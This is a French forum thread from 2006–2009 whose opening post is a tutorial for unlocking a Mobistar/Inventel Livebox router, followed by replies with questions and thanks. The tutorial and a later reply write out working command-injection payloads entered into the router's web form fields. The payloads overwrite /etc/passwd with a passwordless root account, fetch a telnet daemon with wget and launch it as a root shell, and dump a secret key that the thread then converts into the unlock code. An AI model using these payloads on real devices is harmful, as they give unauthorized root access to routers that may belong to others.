TUTO pour le Débridage Livebox MOBISTAR Inventel sous (XP Pro, par telnet)

Discussion sur le fournisser Orange

Modérateur: Barbapapa

TUTO pour le Débridage Livebox MOBISTAR Inventel sous (XP Pr

Message par fabbelgium » 18 Oct 2006 21:39

Voici mon expérience du débridage de la Livebox standard Inventel.

Nécessaire:
1. Windows XP Pro ou Windows 2000 Pro ou l'un des Windows Server; à défaut, l'utilisateur devra installer un serveur FTP tierce;
2. la version 5.03.03-fr du firmware;
3. un câble ethernet de liaison entre l'ordi et la box.

Les étapes:

1. Installer le serveur FTP
Dans Windows XP Pro, il faut installer les composants IIS, si ce n'est déjà fait, et cocher la case Serveur FTP. Une fois la procédure d'installation achevée, cliquez-droit sur l'icône Poste de travail, puis menu Gérer. Développez le noeud Services Internet (IIS), puis le noeud Site FTP. Vérifiez que le sous-noeud Site FTP par défaut est démarré. Sinon, cliquez-droit et choisissez Démarrer. Toujours sur le même noeud, cliquez-droit sur Propriétés, puis choisissez l'onglet Comptes de sécurité. Cochez la case Autoriser les connexions anonymes et les cases N'autoriser que les connexions anonymes et Autoriser la vérification de mot de passe par IIS. Validez en cliquant sur le bouton OK.

2. Télécharger le programme utelnetd
Cliquez sur le lien http://www.agp.dsl.pipex.com/files/utelnetd et enregistrez-le dans le répertoire par défaut du serveur FTP, à savoir C:\inetpub\ftproot, en le renommant u tout court (containte pour la suite des opérations).

Pour la suite des opérations, il est impératif de se déconnecter de l'ADSL étant donné qu'il va falloir downgrader le firmware. Le mieux est de débrancher le câble ADSL.

3.Firmware INVENTEL version : v5.01.7-mobistar-be (voir sur le cd off)ok
Si la version firmware de votre livebox est supérieure ou égale à v5.05.xx, il faut absolument la downgrader en une version inférieure (5.03.3 par exemple pour avoir le voip) sinon il n'est pas possible d'utiliser le backdoor du serveur Web de la livebox, une technique qui consiste à passer des commandes via certaines zones de saisie sur les pages HTML. Ce firmware est disponible sur le CD 6.7.1.a. Pour la procédure, visitez le lien http://www.bichofeo.com/7.htm et téléchargez le fichier rescueinventel.zip qui contient le programme RGWRepair.exe (non présent sur le CD), lequel permet de reflasher la livebox, même celles qui sont tombées en rade (suite à une interruption de flashage, par ex.). Suivez scrupuleusement la procédure, c'est sans risque et réitérable à volonté.

Restez déconnecté de l'ADSL sinon la livebox risque de se mettre à jour automatiquement.

4. Installation du serveur telnet
Il est impératif de changer les adresses IP de la livebox et de l'ordinateur. La raison est que la zone de saisie utilisée accepte un nombre limité de caractères et que toute chaîne trop longue sera tronquée. Pour la livebox, allez dans Configuration->Avancée->Réseau. Changez toutes les adresses (excepté le masque de sous-réseau) pour qu'elles commencent par 10.0.0. L'adresse IP LAN sera donc 10.0.0.1. Décochez la case Activation du serveur DHCP. Cliquez sur Soumettre puis sur Appliquer maintenant la configuration. La box redémarre.
Sous XP, cliquez sur Démarrer->Connexions->Afficher toutes les connexions. Sur l'icône Connexion au réseau local, cliquez-droit puis Propriétés. Dans la liste des éléments, double-cliquez sur Protocole Internet (TCP/IP). Choisissez Utiliser l'adresse IP suivante. Entrez les paramètres suivants:
Adresse IP: 10.0.0.2
Masque: 255.255.255.0
Passerelle: 10.0.0.1
Validez en cliquant sur OK. Il va falloir éventuellement rebooter l'ordinateur.
Il faut maintenant, sur la livebox, suivre la procédure décrite sur le lien http://www.agp.dsl.pipex.com/command_prompt1.html, dont voici une adaptation française:
- Dans Mes services->Internet, dans Identifiant de connection, tapez:
;echo root::0:0:root:/root:/bin/sh>/etc/passwd
(le point-virgule en tête indique au serveur Web qu'il s'agit d'une commande)
puis cliquez sur Valider.
- Remettez votre identifiant puis validez de nouveau.
- Dans Configuration->Advancée->Sans fil, changez l'ESSID 802.11g en:
;cd /etc;wget ftp://10.0.0.2/u
Cliquez sur Soumettre, puis sur Appliquer maintenant la configuration. La box redémarre.
- Toujours dans Configuration->Advancée->Sans fil, changez l'ESSID 802.11g en:
;chmod 777 /etc/u
Cliquez sur Soumettre, puis sur Appliquer maintenant la configuration. La box redémarre.
- Toujours dans Configuration->Advancée->Sans fil, changez l'ESSID 802.11g en:
;/etc/u -p 23 -l /bin/sh -d
Cliquez sur Soumettre, puis sur Appliquer maintenant la configuration. La box redémarre.
- Sous XP, ouvrez une fenêtre DOS (Démarrer->Exécuter... puis tapez cmd puis bouton OK). Dans la fenêtre, tapez telnet 10.0.0.1, vous êtes maintenant dans le shell de la livebox.

6. Récupération de la clé de débridage
Tapez (dans le shell): redboot_fconfig_get --parameter h235_key /dev/mtd4
Une clé de 16 caractères est affichée. Cliquez sur le lien http://www.agp.dsl.pipex.com/h235tounlock.html. Une fenêtre de saisie apparaît. Entrez la précédente clé puis cliquez sur OK. Vous obtenez la clé de débridage. Recopiez-la pour vous en souvenir au cas où.
L'algorithme est simple et consiste en une permutation des caractères. Si le lien ne marche plus, vous pouvez le faire à la main.
clé[ 0] = h235_key[9];
clé[1] = h235_key[4];
clé[2] = h235_key[1];
clé[3] = h235_key[12];
clé[4] = h235_key[14];
clé[5] = h235_key[5];
clé[6] = h235_key[13];
clé[7] = h235_key[6];
clé[8] = h235_key[15];
clé[9] = h235_key[3];
clé[10] = h235_key[8];
clé[11] = h235_key[0];
clé[12] = h235_key[7];
clé[13] = h235_key[10];
clé[14] = h235_key[2];
clé[15] = h235_key[11];

7. Débrigade
Dans l'URL de votre navigateur, tapez: http: //10.0.0.1/brdgoff.html
Une page web pour la saisie de la clé de débridage apparaît. Entrez votre clé puis cliquez sur Soumettre. Une nouvelle page s'affiche avec le message: Votre passerelle a été débridée avec succès.

8. Restauration
Remettez vos adresses réseau antérieures. Reconnectez l'ADSL.

J'ai pu tester une connexion sur Club-Internet non dégroupée avec succès. La page Configuration->Advancée->ADSL présente maintenant de nouvelles options (Protocole pour Internet, Encapsulation, Paramètres ATM) qu'il faut régler en conséquence.

Mais l'expérience ne s'arrête pas là. Au bout de quelques secondes de connexion, les leds de la livebox se sont affolées, puis plus rien, pas de réponse. J'ai dû la débrancher/rebrancher. Toujours rien, bloqué sur une led. Il m'a fallu la reflasher. A la 3eme fois, j'ai laissé faire, le temps de chercher dans le manuel du CD que ce signifiait ce jeu de clignetements. Rien trouvé. (En fait, cela n'est expliqué que sur le site d'Orange). Elle était passée en procédure de mise à jour automatique, et ce, même en étant connecté à Club-Internet ! (Je suis maintenant en v5.05.5-fr).

Deux conclusions s'imposent:
- un reflashage n'annule pas un débrigade;
- la mise à jour automatique est indépendante d'une connexion Wanadoo.

VoIP:
Cette fonction est inutilisable car il n'y a aucune option de paramétrage. Le fait de cliquer sur le bouton Accéder fait apparaître une page web Orange. De plus, chez Club-Internet par ex., le protocole utilisé est MGCP au lieu de SIP.

et voila la livebox de mobistar fonctionne pout tout les providers

Protocole pour Internet PPPoA (PPP over ATM)
PPPoE (PPP over Ethernet)
Bridge
DHCP (dhcp client + nat)
IP Routed (IP over ATM)
Aucun (Internet désactivé)

Encapsulation LLC-Mux
VC-Mux

Paramètres ATM VP VC


Allez, bon débridage !!!
:D :D
fabbelgium
Nouveau
Nouveau
 
Message(s) : 2
Inscription : 18 Oct 2006 21:21

Message par founythedoctor » 18 Oct 2006 22:12

QQ test pour voire et surtout ça apporte quoi pour nous petit belge ???
Image
Samsung Galaxy Gio Cyanogen 7.1 RC3 upgrade 7.2 RC1
Avatar de l’utilisateur
founythedoctor
Membre
Membre
 
Message(s) : 123
Inscription : 30 Mars 2005 14:42

Message par fabbelgium » 18 Oct 2006 22:20

founythedoctor a écrit :QQ test pour voire et surtout ça apporte quoi pour nous petit belge ???


L’avantage de ne pas avoir une livebox qui reste dans l’armoire car en théorie elle ne fonctionne que pour mobistar on peut trouve des livebox a des prix tr intéressant sur ebay et avoir un modem a bas prix avec une utilisation tout provider

j'ai teste la livebox fonctionne avec tout les provider j'ai test sur skynet ok et sur tele2 aussi

ppoe et ppoa ok

modif vpi vci ok

modi vcmux ou llc ok


voila juste pour dire que la liveboxe mobistar est OPEN

il reste a chercher pour trouve une solution faire fonctionne le voip avec un autre firmware
fabbelgium
Nouveau
Nouveau
 
Message(s) : 2
Inscription : 18 Oct 2006 21:21

Message par jpierre7 » 19 Oct 2006 10:19

c'est completement inutile de débloquer ta livebox vu que la livebox est louée uniquement.. donc une fois ton contrat terminé tu dois la rendre..
jpierre7
 

Message par azerty255 » 19 Oct 2006 10:29

On trouve des live box pour +- 30eur sur ebay et qui fonctionne tr bien
azerty255
 

Message par mario234 » 19 Oct 2006 11:39

Il faut trouve la solution pour configure le voip pour pouvoir éventuellement configure netappel

Settings

Username: Votre nom d'utilisateur Netappel
Password: Votre mot de passe Netappel
SIP/Proxy registrar: sip.netappel.com
Domain/Realm (optional): netappel.com
STUN server: stun.netappel.com

Codecs

G.711 (64 kbps)

G.726 (32 kbps)

G.729 (8 kbps)

G.723 (5.3 & 6.3 kbps)

GSMFR (13.2 kbps)
mario234
 

Debrider Livebox sagem

Message par Hicham » 21 Oct 2006 21:08

Merci bcp pour ces info ,j'ai besoins d'aide
je suis au maroc j'ai une Livebox Sagem ,mais él marche pas pour notre fournisseur il faut la débrider ,pouriez vous m'aider :) SVP
Hicham
 

Message par pascuol » 23 Oct 2006 13:44

rends la a celui a qui tu la volée :lol:

:smurf:
humour très déplacé mais c'est de l'humour hein
:bier:
Latribu 13/09/2004 - 07/05/2007
Edpnet (de force) 07/05/2007 - (retenu) 12/10/2007
SDF (Sans Dsl Fixe) :)
Dommel - Homeconnect => 2008 - 2009 et content
SDF (Sans Dsl Fixe)
Swisscom 04/11/2011
http://cinepunch.com/
pascuol
Acharné
Acharné
 
Message(s) : 3229
Inscription : 17 Jan 2005 22:28
Localisation : devant son pc

Re: Debrider Livebox sagem

Message par robertolivac » 26 Oct 2006 11:38

Hicham a écrit :Merci bcp pour ces info ,j'ai besoins d'aide
je suis au maroc j'ai une Livebox Sagem ,mais él marche pas pour notre fournisseur il faut la débrider ,pouriez vous m'aider :) SVP


Regarde le Tuto !!!!

cela fonctionne j'ai teste
robertolivac
 

Message par Invité » 05 Nov 2006 04:05

pascuol a écrit :rends la a celui a qui tu la volée :lol:

:smurf:
humour très déplacé mais c'est de l'humour hein
:bier:


tu peux garder ton humour pour toi, a l'avenir evite ce genre de propos merci :evil: :angryfire:
Invité
 

Message par HICHAM » 17 Nov 2006 18:21

Kikou

mérci pour ton sens d'humour chef , ca me derange pas t'inkiète moi c'est un amis en france qui me la ofert lors de ma visite il l'a acheté et mnt il a pris AOL il a l'aol box mnt car la live marchai pas chez lui ;).

chui po un voleur hein
HICHAM
 

Message par HICHAM » 17 Nov 2006 18:26

le souci c'est que le tuto parle de l'inventel,cepondan moi j'ai une sagem :S :cry: et je veu bien que ma live sagem marche
HICHAM
 

Re: Debrider Livebox sagem

Message par redowa » 28 Nov 2006 17:20

Hicham a écrit :Merci bcp pour ces info ,j'ai besoins d'aide
je suis au maroc j'ai une Livebox Sagem ,mais él marche pas pour notre fournisseur il faut la débrider ,pouriez vous m'aider :) SVP


un bon lifting :wink:
redowa
Nouveau
Nouveau
 
Message(s) : 7
Inscription : 28 Nov 2006 17:00

impossible avec free

Message par yo » 12 Déc 2006 01:47

j'ai fais le debridage du modem mais celui ci ne se connecte pas avec free.
Quels parametres doit on mettre ?
Merci
yo
 

tenet

Message par jeremy697 » 10 Fév 2008 14:25

quand je tape dans le fentre dos "telnet 10.0.0.1" il me met impossible d'ouvrir une connexion à l'hote sur le port 23 echec de la conexion
jeremy697
 

Message par foudre » 27 Oct 2008 19:00

Bonsoir, escusé moi mais je possède aussi une livebox mais ma version est la Firmware_v5-01-7-be.dwb ou puis je trouver votre version ?
SVP
Merci d'avance
foudre
 

probleme de connexion avec le telnet

Message par majvol » 14 Déc 2008 14:46

Bonjour Jeremy697 et Fabbelgium,

Apres 2 ans passé en france, j'ai ramené ma lifebox Inventel pour la connecter sur mon Scralet a Bruxelles.

En cherchant un peu je suis tombé sur ce forum... (bien!)

J'ai appliqué rigoureusement toute la procédure, malheureusement lorsque j'essaye de me connecter via telnet à 10.0.0.1, il me dit impossible d'ouvrir la connexion sur le port 23.

Qu'un peut me dire pourquoi est ce qui peut bien ce passer? Est-ce que Jeremy a régler le probleme?
majvol
 

Message par david0r » 14 Déc 2008 15:19

elle a pas 192.168.1.1 de base?
david0r
Acharné
Acharné
 
Message(s) : 1058
Inscription : 26 Nov 2008 00:30
Localisation : .be

Débridage

Message par Mégamodeste » 01 Juin 2009 21:18

Merci, merci pour ces précieux conseils et le temps que tu as passé pour tes recherches et nous en communiquer le résultat.
T'es un cerveau !
Mégamodeste
 

Méthode plus rapide

Message par franx » 05 Juin 2009 03:44

Salut à tous!

Récemment je me suis trouvé à devoir débrider ma Livebox, et je suis tombé sur ce site. Un grand merci à tous ceux qui ont contribué à cette solution.
Moi je vous propose ma contribution, une méthode beaucoup plus rapide et simple d'obtenir le code nécessaire au débridage.

La voici:

1) Après avoir flashé la Livebox avec la version 5.03.03-fr (ou équivalent) du firmware, allez dans Mes services -> Internet, et dans Identifiant de connection collez le suivant e puis cliquez sur Valider:
;echo `redboot_fconfig_get --parameter h235_key /dev/mtd4` > /var/tmp/AOL_info.xml

2) Dans votre browser préféré, allez à l'adresse suivante:
http://192.168.1.1/AOL_info.xml

Voilà, c'est tout.
Votre browser devrait vous afficher un message comme quoi il y a une erreur dans la première ligne du fichier XML, et il vous montrera cette ligne là (s'il ne vous montre pas la ligne, demandez-lui de vous montrer le code source de la page)

Cette séquence de 16 chiffres et lettres c'est le paramètre h235_key que vous pouvez transformer comme expliqué ailleurs (par exemple, en le collant ici: http://www.agp.dsl.pipex.com/h235tounlock.html) pour obtenir la clé à entrer dans la page http://192.168.1.1/brdgoff.html

Pas de changement d'adresses IP, pas de serveur ftp o http à configurer, pas de serveur telnet à chercher et à installer, pas de temps perdu avec tous les redémarrages... C'est pas la peine de faire le tour par les caves et les souterrains si on peut se faire directement jeter la clé par la fenêtre... ;)

Joyeux débridage à tous!

franx
franx
 

Suivant

Retour vers Orange (Internet)

Qui est en ligne ?

Utilisateur(s) parcourant ce forum : Aucun utilisateur inscrit